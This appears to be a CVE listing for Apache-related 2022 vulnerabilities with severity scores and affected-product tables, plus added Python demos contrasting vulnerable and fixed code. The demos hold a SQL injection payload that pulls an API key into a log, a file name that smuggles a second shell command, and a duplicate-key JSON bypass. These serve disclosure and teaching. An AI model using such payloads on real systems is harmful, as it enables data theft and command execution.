By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter, where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged, causing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
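The injection path described above, as an added example that is not Log4j code: a PatternLayout-style statement has %m substituted as raw text, so a logged message can splice a subquery into the logging INSERT, while the parameterized form Log4j 2 uses stores the same message as inert text. The `logs` and `users` tables, the pattern string and the attacker-controlled message are constructed for illustration, and an in-memory SQLite database stands in for the real logging database.

```python
"""SQL injection through a Log4j 1.2-style JDBCAppender pattern (CVE-2022-23305),
next to the parameterized form Log4j 2 uses.

Added example, not Log4j code. The 'logs' and 'users' tables, the pattern
string and the attacker-controlled log message are constructed for illustration;
an in-memory SQLite database stands in for the real logging database."""
import sqlite3
from typing import List, Tuple

# Log4j 1.2 design: the configured statement is a PatternLayout pattern, so the
# message converter %m is substituted as raw text, with no escaping.
INSECURE_PATTERN = "INSERT INTO logs (message, level) VALUES ('%m', '%p')"

# Constructed attacker input that the application logs verbatim (for instance a
# header value). It closes the string literal and splices in a subquery, so the
# injected SELECT runs inside the logging INSERT.
PAYLOAD = "login failed for ' || (SELECT api_key FROM users WHERE name = 'admin') || '"


def fresh_db() -> sqlite3.Connection:
    """Database with a log table and a constructed secret the attacker wants."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logs (message TEXT, level TEXT)")
    conn.execute("CREATE TABLE users (name TEXT, api_key TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'SECRET-KEY-0001')")
    return conn


def render_pattern(pattern: str, level: str, message: str) -> str:
    """Mimic PatternLayout: %p and %m are replaced by plain text substitution."""
    return pattern.replace("%p", level).replace("%m", message)


def log_insecure(conn: sqlite3.Connection, level: str, message: str) -> str:
    """Vulnerable: the rendered statement is executed as-is. Returns the SQL run."""
    sql = render_pattern(INSECURE_PATTERN, level, message)
    conn.execute(sql)
    return sql


def log_parameterized(conn: sqlite3.Connection, level: str, message: str) -> None:
    """Fixed: the statement is fixed text and the values are bound parameters,
    so the message is stored literally whatever it contains."""
    conn.execute("INSERT INTO logs (message, level) VALUES (?, ?)", (message, level))


def stored_rows(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    return conn.execute("SELECT level, message FROM logs ORDER BY rowid").fetchall()


def demo_insecure() -> List[Tuple[str, str]]:
    """The admin's API key ends up in the log row: the subquery was executed."""
    conn = fresh_db()
    log_insecure(conn, "INFO", PAYLOAD)
    return stored_rows(conn)


def demo_parameterized() -> List[Tuple[str, str]]:
    """The same payload is stored as inert text."""
    conn = fresh_db()
    log_parameterized(conn, "INFO", PAYLOAD)
    return stored_rows(conn)


if __name__ == "__main__":
    print(demo_insecure())       # [('INFO', 'login failed for SECRET-KEY-0001')]
    print(demo_parameterized())
```

The exfiltration lands in the log table itself, which is typically readable through whatever log viewer the application exposes; with a database that permits stacked statements the same substitution point also allows writes.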

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
oracle enterprise_manager_base_platform 13.4.0.0
oracle advanced_supply_chain_planning 12.1
oracle communications_unified_inventory_management 7.4.2
oracle tuxedo 12.2.2.0.0
oracle e-business_suite_cloud_manager_and_cloud_backup_module 2.2.1.1.1
oracle hyperion_infrastructure_technology *
apache log4j *
oracle communications_instant_messaging_server 10.0.1.5.0
oracle enterprise_manager_base_platform 13.5.0.0
oracle communications_unified_inventory_management 7.4.1
oracle hyperion_data_relationship_management *
oracle business_intelligence 12.2.1.4.0
qos reload4j *
oracle financial_services_revenue_management_and_billing_analytics 2.8.0.0
oracle mysql_enterprise_monitor *
netapp snapmanager -
oracle weblogic_server 12.2.1.4.0
oracle business_intelligence 5.9.0.0.0
oracle identity_management_suite 12.2.1.4.0
oracle jdeveloper 12.2.1.3.0
oracle business_intelligence 12.2.1.3.0
oracle communications_offline_mediation_controller *
oracle weblogic_server 12.2.1.3.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.1
oracle identity_management_suite 12.2.1.3.0
oracle communications_network_integrity 7.3.6
oracle retail_extract_transform_and_load 13.2.5
oracle e-business_suite_cloud_manager_and_cloud_backup_module *
oracle healthcare_foundation 8.1.0
oracle middleware_common_libraries_and_tools 12.2.1.4.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.0
broadcom brocade_sannav -
oracle communications_offline_mediation_controller 12.0.0.5.0
oracle business_process_management_suite 12.2.1.4.0
oracle advanced_supply_chain_planning 12.2
oracle weblogic_server 14.1.1.0.0
oracle communications_messaging_server 8.1
oracle e-business_suite_information_discovery *
oracle communications_eagle_ftp_table_base_retrieval 4.5
oracle identity_manager_connector 11.1.1.5.0
CVE-2022-23307 HIGH

CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw V2.0, Chainsaw was a component of Apache Log4j 1.2.x, where the same issue exists.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
oracle enterprise_manager_base_platform 13.4.0.0
oracle advanced_supply_chain_planning 12.1
oracle communications_unified_inventory_management 7.4.2
oracle tuxedo 12.2.2.0.0
oracle e-business_suite_cloud_manager_and_cloud_backup_module 2.2.1.1.1
oracle hyperion_infrastructure_technology *
apache log4j *
oracle communications_instant_messaging_server 10.0.1.5.0
oracle enterprise_manager_base_platform 13.5.0.0
oracle communications_unified_inventory_management 7.4.1
oracle hyperion_data_relationship_management *
oracle business_intelligence 12.2.1.4.0
qos reload4j *
oracle financial_services_revenue_management_and_billing_analytics 2.8.0.0
oracle mysql_enterprise_monitor *
oracle weblogic_server 12.2.1.4.0
oracle business_intelligence 5.9.0.0.0
oracle identity_management_suite 12.2.1.4.0
oracle jdeveloper 12.2.1.3.0
oracle business_intelligence 12.2.1.3.0
oracle communications_offline_mediation_controller *
oracle weblogic_server 12.2.1.3.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.1
oracle identity_management_suite 12.2.1.3.0
apache chainsaw *
oracle communications_network_integrity 7.3.6
oracle retail_extract_transform_and_load 13.2.5
oracle e-business_suite_cloud_manager_and_cloud_backup_module *
oracle healthcare_foundation 8.1.0
oracle middleware_common_libraries_and_tools 12.2.1.4.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.0
oracle communications_offline_mediation_controller 12.0.0.5.0
oracle business_process_management_suite 12.2.1.4.0
oracle advanced_supply_chain_planning 12.2
oracle weblogic_server 14.1.1.0.0
oracle communications_messaging_server 8.1
oracle communications_eagle_ftp_table_base_retrieval 4.5
oracle identity_manager_connector 11.1.1.5.0
CVE-2022-23437 HIGH

There is a vulnerability in the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. It causes the XercesJ XML parser to wait in an infinite loop, which may consume system resources for a prolonged duration. This vulnerability is present in XercesJ version 2.12.1 and previous versions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle financial_services_enterprise_case_management 8.0.7.1
oracle agile_engineering_data_management 6.2.1.0
oracle financial_services_enterprise_case_management 8.1.1.0
oracle financial_services_behavior_detection_platform *
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
oracle retail_bulk_data_integration 16.0.3.0
oracle primavera_gateway *
oracle retail_merchandising_system 16.0.3
apache xerces-j *
oracle agile_plm 9.3.6
oracle retail_integration_bus 15.0.3.1
oracle retail_service_backbone 19.0.1
oracle weblogic_server 12.2.1.3.0
oracle financial_services_enterprise_case_management 8.0.7.2.0
oracle retail_merchandising_system 19.0.1
oracle financial_services_behavior_detection_platform 8.1.2.0
oracle health_sciences_information_manager 3.0.0.1
oracle communications_asap 7.3
oracle retail_extract_transform_and_load 13.2.8
oracle retail_financial_integration 16.0.3
oracle financial_services_enterprise_case_management 8.0.8.1
oracle global_lifecycle_management_opatch *
oracle weblogic_server 14.1.1.0.0
oracle ilearning 6.3
oracle financial_services_behavior_detection_platform 8.1.1.1
oracle financial_services_enterprise_case_management 8.1.1.1
oracle financial_services_behavior_detection_platform 8.1.1.0
oracle retail_financial_integration 14.1.3.2
oracle retail_service_backbone 15.0.3.1
oracle communications_session_route_manager *
oracle ilearning 6.2
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
oracle retail_service_backbone 16.0.3
oracle financial_services_analytical_applications_infrastructure *
oracle retail_integration_bus 14.1.3.2
oracle banking_deposits_and_lines_of_credit_servicing 2.7
oracle banking_party_management 2.7.0
oracle communications_session_report_manager *
oracle retail_integration_bus 16.0.3
oracle peoplesoft_enterprise_peopletools 8.58
oracle retail_financial_integration 15.0.3.1
oracle weblogic_server 12.2.1.4.0
oracle communications_element_manager *
oracle product_lifecycle_analytics 3.6.1
oracle health_sciences_information_manager *
oracle retail_financial_integration 19.0.1
oracle flexcube_universal_banking 12.4.0
oracle global_lifecycle_management_nextgen_oui_framework *
netapp active_iq_unified_manager -
oracle retail_integration_bus 19.0.1
oracle global_lifecycle_management_nextgen_oui_framework 13.9.4.2.2
oracle retail_service_backbone 14.1.3.2
oracle financial_services_enterprise_case_management 8.0.8.0
CVE-2022-23913 MEDIUM

In Apache ActiveMQ Artemis prior to 2.20.0 or 2.19.1, an attacker could partially disrupt availability (DoS) through uncontrolled resource consumption of memory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
netapp active_iq_unified_manager -
apache activemq_artemis *
netapp oncommand_workflow_automation -
CVE-2022-23942 MEDIUM

Apache Doris, prior to 1.0.0, used a hardcoded key and IV to initialize the cipher used for the LDAP password, which may lead to information disclosure.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-798,

Products Affected

Vendor Product Version
apache doris *
CVE-2022-23943 HIGH

Out-of-bounds Write vulnerability in mod_sed of Apache HTTP Server allows an attacker to overwrite heap memory with possibly attacker provided data. This issue affects Apache HTTP Server 2.4 version 2.4.52 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-190,CWE-787,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
debian debian_linux 9.0
oracle zfs_storage_appliance_kit 8.8
fedoraproject fedora 36
CVE-2022-23944 MEDIUM

Users can access the /plugin API without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,CWE-306,

Products Affected

Vendor Product Version
apache shenyu 2.4.0
apache shenyu 2.4.1
CVE-2022-23945 MEDIUM

Missing authentication on ShenYu Admin when registering by HTTP. This issue affected Apache ShenYu 2.4.0 and 2.4.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,CWE-306,

Products Affected

Vendor Product Version
apache shenyu 2.4.0
apache shenyu 2.4.1
CVE-2022-23974 MEDIUM

In Apache Pinot 0.9.3 and older, the segment upload path allowed segment directories to be imported into Pinot tables. In Pinot installations that allow open access to the controller, a specially crafted request can potentially be exploited to disrupt the Pinot service. Pinot release 0.10.0 fixes this. See https://docs.pinot.apache.org/basics/releases/0.10.0

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-674,

Products Affected

Vendor Product Version
apache pinot *
CVE-2022-24070 MEDIUM

Subversion's mod_dav_svn is vulnerable to memory corruption. While looking up path-based authorization rules, mod_dav_svn servers may attempt to use memory which has already been freed. Affected Subversion mod_dav_svn servers 1.10.0 through 1.14.1 (inclusive). Servers that do not use mod_dav_svn are not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apple macos *
apache subversion *
fedoraproject fedora 36
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2022-24112 HIGH

An attacker can abuse the batch-requests plugin to send requests that bypass the IP restriction of the Admin API. A default configuration of Apache APISIX (with the default API key) is vulnerable to remote code execution. When the admin key has been changed, or the Admin API port has been changed to a port different from the data plane, the impact is lower, but there is still a risk of bypassing the IP restriction of Apache APISIX's data plane. There is a check in the batch-requests plugin that overrides the client IP with its real remote IP, but due to a bug in the code this check can be bypassed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-290,

Products Affected

Vendor Product Version
apache apisix *
CVE-2022-24280

Improper Input Validation vulnerability in the Proxy component of Apache Pulsar allows an attacker to make TCP/IP connection attempts that originate from the Pulsar Proxy's IP address. When the Apache Pulsar Proxy component is used, it is possible to attempt to open TCP/IP connections to any IP address and port that the Pulsar Proxy can reach. An attacker could use this as a vector for DoS attacks that originate from the Pulsar Proxy's IP address. No bypass of Pulsar Proxy authentication has been detected: the attacker must hold a valid token for a properly secured Pulsar Proxy. This issue affects Apache Pulsar Proxy versions 2.7.0 to 2.7.4; 2.8.0 to 2.8.2; 2.9.0 to 2.9.1; 2.6.4 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache pulsar *
CVE-2022-24288 MEDIUM

In Apache Airflow, prior to version 2.2.4, some example DAGs did not properly sanitize user-provided params, making them susceptible to OS Command Injection from the web UI.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-24289 MEDIUM

Hessian serialization is a network protocol that supports object-based transmission. Apache Cayenne's optional Remote Object Persistence (ROP) feature is a web services-based technology that provides object persistence and query functionality to 'remote' applications. In Apache Cayenne 4.1 and earlier, running on non-current patch versions of Java, an attacker with client access to Cayenne ROP can transmit a malicious payload to any vulnerable third-party dependency on the server. This can result in arbitrary code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache cayenne *
CVE-2022-24294

A regular expression used in Apache MXNet (incubating) is vulnerable to a potential denial-of-service by excessive resource consumption. The bug could be exploited when loading a model in Apache MXNet that has a specially crafted operator name that would cause the regular expression evaluation to use excessive resources to attempt a match. This issue affects Apache MXNet versions prior to 1.9.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache mxnet *
CVE-2022-24697

Kylin's cube designer function has a command injection vulnerability when overwriting system parameters in the configuration overwrites menu. RCE can be achieved by closing the single quotation marks around the parameter value of “-- conf=” to inject arbitrary operating system commands into the command line parameters. This vulnerability affects Kylin 2 version 2.6.5 and earlier, Kylin 3 version 3.1.2 and earlier, and Kylin 4 version 4.0.1 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache kylin *
CVE-2022-24706 HIGH

In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. The CouchDB documentation has always made recommendations for properly securing an installation, including recommending using a firewall in front of all CouchDB installations.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-1188,

Products Affected

Vendor Product Version
apache couchdb *
CVE-2022-24947 MEDIUM

Apache JSPWiki user preferences form is vulnerable to CSRF attacks, which can lead to account takeover. Apache JSPWiki users should upgrade to 2.11.2 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-24948 MEDIUM

A carefully crafted user preferences submission could trigger an XSS vulnerability in Apache JSPWiki, related to the user preferences screen, which could allow the attacker to execute JavaScript in the victim's browser and obtain sensitive information about the victim. Apache JSPWiki users should upgrade to 2.11.2 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-24963

Integer Overflow or Wraparound vulnerability in apr_encode functions of Apache Portable Runtime (APR) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime (APR) version 1.7.0.

Products Affected

Vendor Product Version
apache portable_runtime 1.7.0
CVE-2022-24969 MEDIUM

Bypass of the fix for CVE-2021-25640: in Apache Dubbo prior to 2.6.12 and 2.7.15, the use of the parseURL method leads to a bypass of the allowed-host check, which can cause an open redirect or SSRF vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,CWE-601,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2022-25147

Integer Overflow or Wraparound vulnerability in apr_base64 functions of Apache Portable Runtime Utility (APR-util) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime Utility (APR-util) 1.6.1 and prior versions.

Products Affected

Vendor Product Version
apache portable_runtime_utility *
CVE-2022-25167 HIGH

Apache Flume versions 1.4.0 through 1.9.0 are vulnerable to a remote code execution (RCE) attack when a configuration uses a JMS Source with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI to allow only the use of the java protocol or no protocol.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,CWE-74,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache flume *
CVE-2022-25168

Apache Hadoop's FileUtil.unTar(File, File) API does not escape the input file name before passing it to the shell, so an attacker can inject arbitrary commands. In Hadoop 3.3 this is only used in InMemoryAliasMap.completeBootstrapTransfer, which is only ever run by a local user. It has been used in Hadoop 2.x for YARN localization, which does enable remote code execution. It is used in Apache Spark, from the SQL command ADD ARCHIVE; as the ADD ARCHIVE command adds new binaries to the classpath, being able to execute shell scripts does not confer new permissions to the caller. SPARK-38305, "Check existence of file before untarring/zipping", which is included in 3.3.0, 3.1.4, 3.2.2, prevents shell commands being executed regardless of which version of the Hadoop libraries is in use. Users should upgrade to Apache Hadoop 2.10.2, 3.2.4, 3.3.3 or later (including HADOOP-18136).
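The bug class above, as an added example that is not Hadoop code: building one shell string from a file name lets metacharacters in the name become extra commands, while passing an argv list to the process (no shell) delivers the name as a single argument. The tar invocation, the extraction directory and the malicious file name are constructed for illustration, and nothing here starts a process; the helper only tokenises the string the way a POSIX shell would, to show what would run.

```python
"""Shell injection through an archive file name, the CVE-2022-25168 pattern,
next to the fix of never letting the name reach a shell.

Added example, not Hadoop code. The tar invocation, the extraction directory and
the file name are constructed for illustration; nothing here executes a process,
the functions only build and inspect the command that would run."""
import shlex
from typing import List

SEPARATORS = {";", "&&", "||", "|", "&"}


def untar_command_insecure(archive: str, dest: str) -> str:
    """Vulnerable: one string handed to /bin/sh -c. Shell metacharacters in
    `archive` are interpreted as part of the command line."""
    return f"cd {dest} && tar -xf {archive}"


def untar_argv_safe(archive: str, dest: str) -> List[str]:
    """Fixed: an argv list for subprocess.run(argv) (shell=False). The name is
    delivered to tar as exactly one argument, whatever characters it contains;
    tar's -C replaces the `cd ... &&` that only existed because a shell was used."""
    return ["tar", "-xf", archive, "-C", dest]


def commands_the_shell_would_run(command: str) -> List[List[str]]:
    """Tokenise like a POSIX shell and split on command separators, to show
    which commands the insecure string really expands to."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    commands: List[List[str]] = []
    current: List[str] = []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


# Constructed malicious file name: a valid-looking archive name followed by a
# second command.
MALICIOUS_NAME = "report.tar; touch /tmp/pwned"

if __name__ == "__main__":
    print(commands_the_shell_would_run(untar_command_insecure(MALICIOUS_NAME, "/srv/extract")))
    print(untar_argv_safe(MALICIOUS_NAME, "/srv/extract"))
```

Quoting the name with shlex.quote() before interpolation would also neutralise this particular string, but the argv form removes the shell entirely and so has no quoting rules left to get wrong.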

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache hadoop *
CVE-2022-25169 MEDIUM

The BPG parser in versions of Apache Tika before 1.28.2 and 2.4.0 may allocate an unreasonable amount of memory on carefully crafted files.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
oracle primavera_unifier 20.12
oracle primavera_unifier 19.12
oracle primavera_unifier 21.12
apache tika *
oracle primavera_unifier *
oracle primavera_unifier 18.8
CVE-2022-25312 MEDIUM

An XML external entity (XXE) injection vulnerability was discovered in the Any23 RDFa XSLTStylesheet extractor and is known to affect Any23 versions < 2.7. XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. This issue is fixed in Apache Any23 2.7.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache any23 *
CVE-2022-25370

Apache OFBiz uses the Birt plugin (https://eclipse.github.io/birt-website/) to create data visualizations and reports. In Apache OFBiz release 18.12.05, and earlier versions, by leveraging a vulnerability in Birt (https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142), an unauthenticated malicious user could perform a stored XSS attack in order to inject a malicious payload and execute it using the stored XSS.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2022-25371

Apache OFBiz uses the Birt project plugin (https://eclipse.github.io/birt-website/) to create data visualizations and reports. By leveraging a bug in Birt (https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142) it is possible to perform a remote code execution (RCE) attack in Apache OFBiz, release 18.12.05 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2022-25598 MEDIUM

Apache DolphinScheduler user registration is vulnerable to Regular expression Denial of Service (ReDoS) attacks. Apache DolphinScheduler users should upgrade to version 2.0.5 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-1333,

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2022-25757 MEDIUM

In Apache APISIX before 2.13.0, when decoding JSON with duplicate keys, lua-cjson chooses the last occurrence as the result. By passing JSON with a duplicate key, an attacker can bypass the body_schema validation in the request-validation plugin. For example, `{"string_payload":"bad","string_payload":"good"}` can be used to hide the "bad" input. Systems satisfying all three conditions below are affected:
1. body_schema validation is used in the request-validation plugin;
2. the upstream application uses a JSON library that chooses the first occurrence, such as jsoniter or gojay;
3. the upstream application does not validate the input itself.
The fix in APISIX is to re-encode the validated JSON input back into the request body on the APISIX side. This issue affects Apache APISIX version 2.12.1 and prior versions.
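The three-condition bypass above and the re-encoding fix, as an added example that is not APISIX code. The gateway, upstream and schema functions and the request body are constructed for illustration: `json.loads` plays the role of lua-cjson (last duplicate wins) and `first_key_wins()` plays the role of a first-wins upstream parser of the kind the advisory names. The example also shows a duplicate-key check that either side can run as a defence.

```python
"""Schema-validation bypass via duplicate JSON keys (CVE-2022-25757) and the
APISIX-style fix of re-encoding what was actually validated.

Added example, not APISIX code. The gateway, upstream and schema functions and
the request body are constructed for illustration: json.loads plays the role
of lua-cjson (last duplicate wins) and first_key_wins() plays the role of a
first-wins upstream parser of the kind the advisory names."""
import json
from typing import Any, Dict, List, Tuple

ALLOWED_VALUES = {"good", "ok"}          # stand-in for the body_schema rule

# Constructed request body from the advisory: the first value is the one the
# attacker wants through, the second is the one the gateway will see.
BODY = '{"string_payload":"bad","string_payload":"good"}'


def last_key_wins(body: str) -> Dict[str, Any]:
    """json.loads keeps the last duplicate, as lua-cjson does."""
    return json.loads(body)


def first_key_wins(body: str) -> Dict[str, Any]:
    """A first-wins parser, built with object_pairs_hook."""
    def keep_first(pairs: List[Tuple[str, Any]]) -> Dict[str, Any]:
        out: Dict[str, Any] = {}
        for key, value in pairs:
            out.setdefault(key, value)
        return out
    return json.loads(body, object_pairs_hook=keep_first)


def has_duplicate_keys(body: str) -> bool:
    """Defensive check either side can run: detect any repeated key in any object."""
    found = False

    def check(pairs: List[Tuple[str, Any]]) -> Dict[str, Any]:
        nonlocal found
        keys = [key for key, _ in pairs]
        if len(keys) != len(set(keys)):
            found = True
        return dict(pairs)

    json.loads(body, object_pairs_hook=check)
    return found


def gateway_validate(body: str) -> bool:
    """Stand-in for body_schema validation, run over the last-wins parse."""
    value = last_key_wins(body).get("string_payload")
    return isinstance(value, str) and value in ALLOWED_VALUES


def gateway_forward_vulnerable(body: str) -> str:
    """Before 2.13.0: validate the parsed object, forward the raw body untouched."""
    if not gateway_validate(body):
        raise ValueError("rejected by schema")
    return body


def gateway_forward_fixed(body: str) -> str:
    """Fixed: re-encode the validated object so upstream receives exactly what
    the schema check saw, with no duplicates left to reinterpret."""
    if not gateway_validate(body):
        raise ValueError("rejected by schema")
    return json.dumps(last_key_wins(body))


def upstream_value(forwarded_body: str) -> str:
    """Upstream uses a first-wins parser and trusts the gateway's validation."""
    return first_key_wins(forwarded_body)["string_payload"]


if __name__ == "__main__":
    print(upstream_value(gateway_forward_vulnerable(BODY)))  # bad
    print(upstream_value(gateway_forward_fixed(BODY)))       # good
```

Re-encoding fixes the gateway side; an upstream that cannot rely on its gateway should reject duplicate keys outright, which `has_duplicate_keys()` shows is cheap to do with any parser that exposes the raw key/value pairs.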

CVSS 3.x

